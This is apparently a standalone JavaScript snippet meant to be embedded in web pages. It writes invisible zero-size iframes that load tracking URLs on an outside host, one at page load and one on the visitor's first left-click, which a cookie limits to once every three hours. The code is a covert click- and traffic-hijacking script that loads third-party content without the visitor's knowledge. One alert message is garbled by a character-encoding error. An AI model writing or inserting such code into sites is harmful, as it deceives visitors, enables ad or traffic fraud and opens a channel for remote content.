document.write("<iframe id=yitianiframe name=yitianiframe width=0 height=0 border=0 marginwidth=0 marginheight=0 frameborder=no src=''></iframe>");
function yitiancook()
{
var is_goopen = 1;
var exphour_open = 3; 
var exp_open = new Date(); 
exp_open.setTime(exp_open.getTime() + (exphour_open*60*60*1000));
if(is_goopen == 0) 
{
alert("cookie²»Æð×÷ÓÃ");
} 
else
{
    if(document.cookie.indexOf('yitianclick') == -1)
	  {
        document.cookie = "yitianclick=yes" + "; expires=" + exp_open.toGMTString();
           document.getElementById("yitianiframe").src="http://play.unionsky.cn/track/?DotID=742";
       }
}
}
function   yitianclick()   
  {   
  if   (event.button==1)  {yitiancook();}
  }
document.onmousedown=yitianclick;

document.write("<IFRAME WIDTH=0 HEIGHT=0 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000' SRC='http://play.unionsky.cn/track/?DotID=741'></IFRAME>");